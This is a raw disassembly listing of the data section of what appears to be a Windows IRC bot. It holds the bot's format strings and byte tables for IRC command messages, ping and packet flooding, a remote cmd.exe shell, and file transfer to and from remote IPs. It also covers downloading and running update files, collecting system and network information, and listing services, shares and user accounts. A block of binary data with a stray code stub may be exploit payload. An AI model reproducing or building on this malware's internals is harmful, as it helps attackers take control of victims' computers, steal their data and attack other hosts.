db 2
aFinishedSendin db ' Finished sending pings to %s.',0
align 4
unk_42DAD8 db 2 ; DATA XREF: sub_40AF86+6E�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 69h, 6Eh
db 67h ; g
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aErrorSendingPi db ' Error sending pings to %s.',0
align 10h
dword_42DB10 dd 7A026E02h, 201F6D1Fh, 70647528h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40B112+1C6�o
dd 2BBBB02h
aFinishedSend_0 db ' Finished sending packets to %s.',0
align 4
dword_42DB4C dd 7A026E02h, 201F6D1Fh, 70647528h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40B112+8E�o
dd 2BBBB02h
aErrorSending_1 db ' Error sending pings to %s.',0
align 4
aPrivmsgSS db 'PRIVMSG %s :%s',0Dh,0 ; DATA XREF: sub_40B390+33�o
dword_42DB94 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40B417:loc_40B549�o
dd 2BBBB02h
aCouldNotReadDa db ' Could not read data from proccess.',0Dh,0Ah,0
align 4
dword_42DBD4 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40B417+10F�o
dd 2BBBB02h
aProccessHasTer db ' Proccess has terminated.',0Dh,0Ah,0
align 4
dword_42DC0C dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40B417:loc_40B4FD�o
dd 2BBBB02h
aCouldNotRead_0 db ' Could not read data from proccess',0Dh,0Ah,0
align 4
dword_42DC4C dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40B56C+194�o
dd 2BBBB02h
aFailedToStartI db ' Failed to start IO thread, error: <%d>.',0
align 10h
dword_42DC90 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40B56C+14C�o
dd 2BBBB02h
aRemoteCommandP db ' Remote Command Prompt',0
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_40B56C+21�o
aDdDhDm db '%dd %dh %dm',0 ; DATA XREF: sub_40B721+52�o
aSysinfoCpuI64u db '[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB total, %sKB free. [Disk]:'
; DATA XREF: sub_40B8D8+297�o
db ' %s total, %s free. [OS]: Windows %s (%d.%d, Build %d). [Sysdir]:'
db ' %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s. [Time]:'
db ' %s. [Uptime]: %s.',0
align 4
aDdMmmYyyy db 'dd:MMM:yyyy',0 ; DATA XREF: sub_40B8D8+192�o
aCouldnTResolve db 'couldn',27h,'t resolve host',0 ; DATA XREF: sub_40B8D8:loc_40BA3C�o
align 10h
word_42DDD0 dw 3Fh ; DATA XREF: sub_40B8D8:loc_40B9DA�r
; sub_40D099+1F�o
align 4
dword_42DDD4 dd 28207325h, 297325h ; DATA XREF: sub_40B8D8+EB�o
dword_42DDDC dd 3F3F3Fh ; DATA XREF: sub_40B8D8:loc_40B99B�o
; _0:loc_415C0F�o
a2003 db '2003',0 ; DATA XREF: sub_40B8D8+BA�o
align 4
aXp db 'XP',0 ; DATA XREF: sub_40B8D8+AA�o
; _0:00415BFA�o
align 4
a2k db '2K',0 ; DATA XREF: sub_40B8D8+98�o
; _0:00415BEA�o
align 10h
aMe db 'ME',0 ; DATA XREF: sub_40B8D8+7E�o
; _0:00415BD1�o
align 4
a98 db '98',0 ; DATA XREF: sub_40B8D8+6C�o
; _0:00415BC1�o
align 4
aNt db 'NT',0 ; DATA XREF: sub_40B8D8+5A�o
; _0:00415BB1�o
align 4
a95 db '95',0 ; DATA XREF: sub_40B8D8+46�o
; _0:00415BA3�o
align 10h
aNetinfoTypeSS_ db '[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.',0
; DATA XREF: sub_40BB8C+A4�o
align 10h
off_42DE40 dd offset loc_412F4E ; DATA XREF: sub_40BB8C:loc_40BBF8�o
off_42DE44 dd offset dword_4E414C ; DATA XREF: sub_40BB8C:loc_40BBEE�o
dword_42DE48 dd 6C616944h, 70752Dh ; DATA XREF: sub_40BB8C+5B�o
dword_42DE50 dd 20746F4Eh, 6E6E6F63h, 65746365h, 64h ; DATA XREF: sub_40BB8C+48�o
unk_42DE60 db 2 ; DATA XREF: sub_40BC4B:loc_40BE04�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 76h, 69h, 73h
db 69h ; i
db 74h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToConnec db 'Failed to connect to HTTP server.',0
align 10h
unk_42DEA0 db 2 ; DATA XREF: sub_40BC4B:loc_40BDFD�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 76h, 69h, 73h
db 69h ; i
db 74h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aCouldNotOpenAC db 'Could not open a connection.',0
align 4
dword_42DEDC dd 7A026E02h, 201F6D1Fh, 73697628h, 702E7469h, 671F6C1Fh
; DATA XREF: sub_40BC4B+1A0�o
dd 0BB022029h, 202002BBh, 61766E49h, 2064696Ch, 2E4C5255h
dd 0
unk_42DF08 db 2 ; DATA XREF: sub_40BC4B:loc_40BDDE�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 76h, 69h, 73h
db 69h ; i
db 74h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToGetReq db 'Failed to get requested URL from HTTP server.',0
align 4
dword_42DF54 dd 7A026E02h, 201F6D1Fh, 73697628h, 702E7469h, 671F6C1Fh
; DATA XREF: sub_40BC4B+18C�o
dd 0BB022029h, 202002BBh, 204C5255h, 69736976h, 2E646574h
dd 0
dword_42DF80 dd 2A2F2Ah ; DATA XREF: sub_40BC4B+3B�o
dword_42DF84 dd 202E6425h, 3D207325h, 732520h ; DATA XREF: sub_40BEF5+35�o
dword_42DF90 dd 6C415B2Dh, 20736169h, 7473694Ch, 2D5Dh ; DATA XREF: sub_40BEF5+10�o
a_2d_2d4d_2d_2d db '[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s',0 ; DATA XREF: sub_40BF6D+60�o
align 4
dword_42DFC4 dd 7A026E02h, 201F6D1Fh, 676F6C28h, 1F702E73h, 29671F6Ch
; DATA XREF: sub_40C00D+1A�o
dd 0BBBB0220h, 20202002h, 61656C43h, 2E646572h, 0
dword_42DFEC dd 7A026E02h, 201F6D1Fh, 676F6C28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C07F+DC�o
dd 2BBBB02h, 694C2020h, 63207473h, 6C706D6Fh, 2E657465h
dd 0
dword_42E018 dd 7A026E02h, 201F6D1Fh, 676F6C28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C07F+3F�o
dd 2BBBB02h, 65422020h, 6E6967h
dword_42E038 dd 80000002h, 42F6CCh, 80000002h, 42F6FCh, 80000001h, 42F734h
; DATA XREF: sub_40C1AE+7�o
dword_42E050 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C1AE+63�o
; sub_40C351+170�o
dd 2BBBB02h
aFailedToSendTo db ' Failed to send to Remote command shell.',0
align 4
dword_42E094 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C351+AB�o
dd 2BBBB02h
aFailedToOpenRe db ' Failed to open remote command shell.',0
align 4
dword_42E0D4 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C351+47�o
; sub_40C512+FD�o
dd 2BBBB02h
aFailedToOpenSo db ' Failed to open socket.',0
align 4
dword_42E108 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C512+362�o
; sub_40C8B4+156�o
dd 2BBBB02h, 6F532020h, 74656B63h, 72726520h, 2E726Fh
dword_42E130 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C512+2FA�o
dd 2BBBB02h
aTransferComp_0 db ' Transfer complete to IP: %s, Filename: %s (%s bytes).',0
dword_42E180 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C512+202�o
dd 2BBBB02h
aUnableToOpenSo db ' Unable to open socket.',0
align 4
dword_42E1B4 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C512+1CB�o
dd 2BBBB02h, 65532020h, 7420646Eh, 6F656D69h, 2E7475h
dword_42E1DC dd 43434401h, 4E455320h, 73252044h, 20692520h, 25206925h
; DATA XREF: sub_40C512+16A�o
dd 169h
dword_42E1F4 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C512+127�o
dd 2BBBB02h
aFileDoesnTExis db ' File doesn',27h,'t exist.',0
align 4
dword_42E224 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C512+82�o
dd 2BBBB02h
aFailedToBindTo db ' Failed to bind to socket.',0
dword_42E258 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C512+44�o
dd 2BBBB02h
aFailedToCreate db ' Failed to create socket.',0
align 4
dword_42E28C dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C8B4+1D1�o
dd 2BBBB02h
aTransferComp_1 db ' Transfer complete from IP: %s, Filename: %s (%s bytes).',0
align 10h
dword_42E2E0 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C8B4+CB�o
dd 2BBBB02h
aErrorOpeningSo db ' Error opening socket.',0
dword_42E310 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C8B4+AB�o
dd 2BBBB02h
aErrorOpeningFi db ' Error opening file for writing.',0
align 4
aAB db 'a+b',0 ; DATA XREF: sub_40C8B4+97�o
dword_42E350 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C8B4+83�o
dd 2BBBB02h
aErrorUnableToW db ' Error unable to write file to disk.',0
align 10h
unk_42E390 db 2 ; DATA XREF: sub_40CAF1+493�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aBadUrlOrDnsErr db ' Bad URL, or DNS Error: %s.',0
align 4
unk_42E3CC db 2 ; DATA XREF: sub_40CAF1+485�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUpdateFailedEr db ' Update failed: Error executing file: %s.',0
unk_42E414 db 2 ; DATA XREF: sub_40CAF1+3C9�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDownloaded_1fk db ' Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.',0
align 4
dword_42E464 dd 7A026E02h, 201F6D1Fh, 776F6428h, 616F6C6Eh, 1F702E64h
; DATA XREF: sub_40CAF1+358�o
dd 29671F6Ch, 0BBBB0220h, 4F202002h, 656E6570h, 25203A64h
dd 2E73h
aOpen db 'open',0 ; DATA XREF: sub_40CAF1+336�o
; sub_40EE72+2B48�o ...
align 4
unk_42E498 db 2 ; DATA XREF: sub_40CAF1+2E1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDownloaded_1fK db ' Downloaded %.1f KB to %s @ %.1f KB/sec.',0
align 10h
unk_42E4E0 db 2 ; DATA XREF: sub_40CAF1+262�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aCrcFailedDD_ db ' CRC Failed (%d != %d).',0
align 4
unk_42E518 db 2 ; DATA XREF: sub_40CAF1+1D8�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFilesizeIsInco db ' Filesize is incorrect: (%d != %d).',0
align 4
unk_42E55C db 2 ; DATA XREF: sub_40CAF1+195�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUpdateSDkbTran db ' Update: %s (%dKB transferred).',0
align 4
unk_42E59C db 2 ; DATA XREF: sub_40CAF1+183�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFileDownloadSD db ' File download: %s (%dKB transferred).',0
align 4
unk_42E5E4 db 2 ; DATA XREF: sub_40CAF1+77�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aCouldnTOpenFil db ' Couldn',27h,'t open file: %s.',0
align 4
aUnknown_0 db 'Unknown',0 ; DATA XREF: sub_40D099:loc_40D0DC�o
; sub_40DF4E+10A�o
aInvalid db 'Invalid',0 ; DATA XREF: sub_40D099:loc_40D0D6�o
aDisk db 'Disk',0 ; DATA XREF: sub_40D099:loc_40D0D0�o
align 4
aNetwork db 'Network',0 ; DATA XREF: sub_40D099:loc_40D0CA�o
aCdrom db 'Cdrom',0 ; DATA XREF: sub_40D099:loc_40D0C4�o
align 4
off_42E644 dd offset locret_4D4152 ; DATA XREF: sub_40D099:loc_40D0BE�o
aFailed db 'failed',0 ; DATA XREF: sub_40D12A:loc_40D208�o
; sub_40D24E+3B�o
align 10h
aSkb db '%sKB',0 ; DATA XREF: sub_40D12A+6C�o
align 4
unk_42E658 db 2 ; DATA XREF: sub_40D24E+8E�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 63h, 6Fh, 72h
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSDriveSSTotalS db ' %s Drive (%s): %s total, %s free, %s available.',0
align 4
unk_42E6A4 db 2 ; DATA XREF: sub_40D24E+58�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 63h, 6Fh, 72h
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSDriveSFailedT db ' %s Drive (%s): Failed to stat, device not ready.',0
aA_0 db 'A:\',0 ; DATA XREF: sub_40D320:loc_40D365�o
dword_42E6F4 dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 ; DATA XREF: sub_40D4C5+A4�o
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_42E740 dd 3000005h, 10h, 18h, 1, 3 dup(0) ; DATA XREF: sub_40D4C5+E3�o
; ---------------------------------------------------------------------------
loc_42E75C: ; DATA XREF: sub_40D4C5+118�o
mov al, 1
push edx
xchg eax, edi
retf 0D059h
; ---------------------------------------------------------------------------
db 11h
dd 0A000D5A8h, 51800DC9h, 0
dword_42E770 dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
; DATA XREF: sub_40D4C5+13F�o
dword_42E784 dd 25207325h, 253A2073h, 0A0D73h ; DATA XREF: sub_40D679+5D�o
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_40D679+16�o
; sub_40EE72+623�o
aNotice db 'NOTICE',0 ; DATA XREF: sub_40D679+F�o
; sub_40EE72+62F�o
align 10h
off_42E7A0 dd offset aAdd ; DATA XREF: sub_40D719+60�r
; sub_40DAF0+51�r ...
; "Add"
off_42E7A4 dd offset aAdded ; DATA XREF: sub_40D719+2D�r
; sub_40DAF0+83�r ...
; "Added"
dword_42E7A8 dd 0 ; DATA XREF: sub_40D719+18�r
dd offset aDelete_0 ; "Delete"
dd offset aDeleted ; "Deleted"
align 8
dd offset aList_0 ; "List"
dd offset aListed ; "Listed"
dd 0
dd offset aStart_0 ; "Start"
dd offset aStarted ; "Started"
align 10h
dd offset aStop_0 ; "Stop"
dd offset aStopped_0 ; "Stopped"
dd 1, 42E814h, 42E80Ch, 2, 42E800h, 42E7F4h, 3, 746E6F43h
dd 65756E69h, 64h, 746E6F43h, 65756E69h, 0
aPaused db 'Paused',0
align 4
aPause_0 db 'Pause',0
align 4
aStopped_0 db 'Stopped',0 ; DATA XREF: _2:0042E7D4�o
aStop_0 db 'Stop',0 ; DATA XREF: _2:0042E7D0�o
align 4
aStarted db 'Started',0 ; DATA XREF: _2:0042E7C8�o
aStart_0 db 'Start',0 ; DATA XREF: _2:0042E7C4�o
align 4
aListed db 'Listed',0 ; DATA XREF: _2:0042E7BC�o
align 4
aList_0 db 'List',0 ; DATA XREF: _2:0042E7B8�o
align 4
aDeleted db 'Deleted',0 ; DATA XREF: _2:0042E7B0�o
aDelete_0 db 'Delete',0 ; DATA XREF: _2:0042E7AC�o
align 4
aAdded db 'Added',0 ; DATA XREF: _2:off_42E7A4�o
align 4
aAdd db 'Add',0 ; DATA XREF: _2:off_42E7A0�o
dword_42E868 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D719+67�o
dd 2BBBB02h
aSNoServiceSpec db ' %s: No service specified.',0
dword_42E89C dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D719+51�o
dd 2BBBB02h
aErrorWithServi db ' Error with service: ',27h,'%s',27h,'. %s',0
align 4
dword_42E8D4 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D719+33�o
dd 2BBBB02h
aSServiceS_ db ' %s service: ',27h,'%s',27h,'.',0
aAnUnknownErr_0 db 'An unknown error occurred: <%ld>',0 ; DATA XREF: sub_40D835+12C�o
align 4
aTheSystemIsShu db 'The system is shutting down.',0 ; DATA XREF: sub_40D835:loc_40D94D�o
align 4
aTheServiceHasN db 'The service has not been started.',0 ; DATA XREF: sub_40D835:loc_40D946�o
align 4
aTheRequested_1 db 'The requested control code cannot be sent to the service because '
; DATA XREF: sub_40D835:loc_40D93F�o
db 'the state of the service.',0
align 4
aTheServiceHa_0 db 'The service has been marked for deletion.',0
; DATA XREF: sub_40D835:loc_40D938�o
align 10h
aTheServiceCoul db 'The service could not be logged on. The account does not have the'
; DATA XREF: sub_40D835:loc_40D931�o
db ' correct access rights.',0
align 4
aTheSpecified_0 db 'The specified service does not exist.',0
; DATA XREF: sub_40D835:loc_40D92A�o
align 4
aTheServiceHasB db 'The service has been disabled.',0 ; DATA XREF: sub_40D835:loc_40D923�o
align 4
aTheServiceDe_0 db 'The service depends on another service that has failed to start.',0
; DATA XREF: sub_40D835:loc_40D91C�o
align 4
aTheServiceDepe db 'The service depends on a service that does not exist or has been '
; DATA XREF: sub_40D835:loc_40D915�o
db 'marked for deletion.',0
align 10h
aTheSpecifiedDa db 'The specified database does not exist.',0
; DATA XREF: sub_40D835:loc_40D90E�o
align 4
aAnInstanceOfTh db 'An instance of the service is already running.',0
; DATA XREF: sub_40D835:loc_40D8E3�o
align 4
aTheRequested_0 db 'The requested control code is not valid, or it is unacceptable to'
; DATA XREF: sub_40D835:loc_40D8DC�o
db ' the service.',0
align 4
aTheProcessForT db 'The process for the service was started, but it did not call Star'
; DATA XREF: sub_40D835:loc_40D8D5�o
db 'tServiceCtrlDispatcher.',0
align 4
aAThreadCouldNo db 'A thread could not be created for the service.',0
; DATA XREF: sub_40D835:loc_40D8CE�o
align 4
aTheDatabaseIsL db 'The database is locked.',0 ; DATA XREF: sub_40D835+8F�o
aTheServiceCann db 'The service cannot be stopped because other running services are '
; DATA XREF: sub_40D835:loc_40D8A3�o
db 'dependent on it.',0
align 10h
aTheServiceBina db 'The service binary file could not be found.',0
; DATA XREF: sub_40D835:loc_40D899�o
aTheHandleDoesN db 'The handle does not have the required access right.',0
; DATA XREF: sub_40D835:loc_40D88F�o
aTheHandleIsInv db 'The handle is invalid.',0 ; DATA XREF: sub_40D835:loc_40D885�o
align 4
aTheRequestedCo db 'The requested control code is undefined.',0
; DATA XREF: sub_40D835:loc_40D87B�o
align 4
aTheSpecifiedSe db 'The specified service name is invalid.',0 ; DATA XREF: sub_40D835+3C�o
align 4
aSSS db '%s: %s (%s)',0 ; DATA XREF: sub_40D9B3+EB�o
aStopped db ' Stopped',0 ; DATA XREF: sub_40D9B3:loc_40DA7F�o
aStarting db ' Starting',0 ; DATA XREF: sub_40D9B3:loc_40DA78�o
aStoping db ' Stoping',0 ; DATA XREF: sub_40D9B3:loc_40DA71�o
aRunning db ' Running',0 ; DATA XREF: sub_40D9B3:loc_40DA6A�o
aContinuing db ' Continuing',0 ; DATA XREF: sub_40D9B3:loc_40DA63�o
aPausing db ' Pausing',0 ; DATA XREF: sub_40D9B3:loc_40DA5C�o
aPaused_0 db ' Paused',0 ; DATA XREF: sub_40D9B3:loc_40DA55�o
aUnknown_1 db ' Unknown',0 ; DATA XREF: sub_40D9B3+9B�o
aTheFollowingWi db 'The following Windows services are registered:',0
; DATA XREF: sub_40D9B3+25�o
align 4
dword_42EE38 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40DAF0+AC�o
dd 2BBBB02h
aSNoShareSpecif db ' %s: No share specified.',0
align 4
dword_42EE6C dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40DAF0+8A�o
dd 2BBBB02h
aSShareS_ db ' %s share: ',27h,'%s',27h,'.',0
align 4
dword_42EE98 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40DAF0+58�o
dd 2BBBB02h
aSErrorWithShar db ' %s: Error with share: ',27h,'%s',27h,'. %s',0
align 4
a14s24s6u4s db '%-14S %-24S %-6u %-4s',0 ; DATA XREF: sub_40DCE6+D0�o
align 4
aNo db 'No',0 ; DATA XREF: sub_40DCE6+BC�o
align 10h
aYes db 'Yes',0 ; DATA XREF: sub_40DCE6+B5�o
dword_42EEF4 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40DCE6+76�o
dd 2BBBB02h
aShareListError db ' Share list error: %s <%ld>',0
align 4
aShareNameResou db 'Share name: Resource: Uses: Desc:',0
; DATA XREF: sub_40DCE6+26�o
align 4
dword_42EF64 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40DE07+B7�o
dd 2BBBB02h
aSNoUsernameSpe db ' %s: No username specified.',0
align 4
dword_42EF9C dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40DE07+95�o
dd 2BBBB02h
aSErrorWithUser db ' %s: Error with username: ',27h,'%s',27h,'. %s',0
dword_42EFD8 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40DE07+6D�o
dd 2BBBB02h
aSUsernameS_ db ' %s username: ',27h,'%s',27h,'.',0
align 4
dword_42F008 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40DF4E+3AF�o
dd 2BBBB02h
aUserInfoErrorL db ' User info error: <%ld>',0
align 4
aUnitsPerWeekD db 'Units Per Week: %d',0 ; DATA XREF: sub_40DF4E+385�o
align 10h
aMax_StorageD db 'Max. Storage: %d',0 ; DATA XREF: sub_40DF4E+35A�o
align 4
aUserSLanguageD db 'User',27h,'s Language: %d',0 ; DATA XREF: sub_40DF4E+32F�o
aCountryCodeD db 'Country Code: %d',0 ; DATA XREF: sub_40DF4E+304�o
align 4
aWorkstationsS db 'Workstations: %S',0 ; DATA XREF: sub_40DF4E+2D9�o
align 10h
aLogonServerS db 'Logon Server: %S',0 ; DATA XREF: sub_40DF4E+2AE�o
align 4
aLastLogoffD db 'Last Logoff: %d',0 ; DATA XREF: sub_40DF4E+283�o
aLastLogonD db 'Last Logon: %d',0 ; DATA XREF: sub_40DF4E+258�o
align 4
aNumberOfLogins db 'Number of Logins: %d',0 ; DATA XREF: sub_40DF4E+22D�o
align 4
aBadPasswordCou db 'Bad Password Count: %d',0 ; DATA XREF: sub_40DF4E+202�o
align 4
aPasswordAgeD db 'Password Age: %d',0 ; DATA XREF: sub_40DF4E+1D7�o
align 4
aParametersS db 'Parameters: %S',0 ; DATA XREF: sub_40DF4E+1AC�o
align 4
aHomeDirectoryS db 'Home Directory: %S',0 ; DATA XREF: sub_40DF4E+181�o
align 4
aAuthFlagsD db 'Auth Flags: %d',0 ; DATA XREF: sub_40DF4E+156�o
align 4
aPrivilegeLevel db 'Privilege Level: %s',0 ; DATA XREF: sub_40DF4E+12B�o
aGuest db 'Guest',0 ; DATA XREF: sub_40DF4E:loc_40E06D�o
align 4
aUser_1 db 'User',0 ; DATA XREF: sub_40DF4E:loc_40E066�o
align 10h
aAdministrator db 'Administrator',0 ; DATA XREF: sub_40DF4E:loc_40E05F�o
; _2:0042F774�o
align 10h
aCommentS db 'Comment: %S',0 ; DATA XREF: sub_40DF4E+DA�o
aUserCommentS db 'User Comment: %S',0 ; DATA XREF: sub_40DF4E+AF�o
align 10h
aFullNameS db 'Full Name: %S',0 ; DATA XREF: sub_40DF4E+84�o
align 10h
aAccountS db 'Account: %S',0 ; DATA XREF: sub_40DF4E+50�o
aTotalUsersFoun db 'Total users found: %d.',0 ; DATA XREF: sub_40E337+14F�o
align 4
dword_42F1D4 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40E337+F7�o
dd 2BBBB02h
aAnAccessViolat db ' An access violation has occured.',0
align 10h
aS_6 db ' %S',0 ; DATA XREF: sub_40E337+BE�o
align 4
dword_42F218 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40E337+7A�o
dd 2BBBB02h
aUserListErrorS db ' User list error: %s <%ld>',0
aUsernameAccoun db 'Username accounts for local system:',0 ; DATA XREF: sub_40E337+29�o
aNetworkConnect db 'Network connection not found.',0 ; DATA XREF: sub_40E4B7:loc_40E5D4�o
align 10h
aTheUserNameCou db 'The user name could not be found.',0 ; DATA XREF: sub_40E4B7:loc_40E5CD�o
align 4
aShareNotFound_ db 'Share not found.',0 ; DATA XREF: sub_40E4B7:loc_40E5C6�o
align 4
aTheComputerNam db 'The computer name is invalid.',0 ; DATA XREF: sub_40E4B7:loc_40E5BF�o
align 4
aAnUnknownError db 'An unknown error occurred.',0 ; DATA XREF: sub_40E4B7:loc_40E5B8�o
align 4
aThePasswordIsS db 'The password is shorter than required (or does not meet the passw'
; DATA XREF: sub_40E4B7:loc_40E59B�o
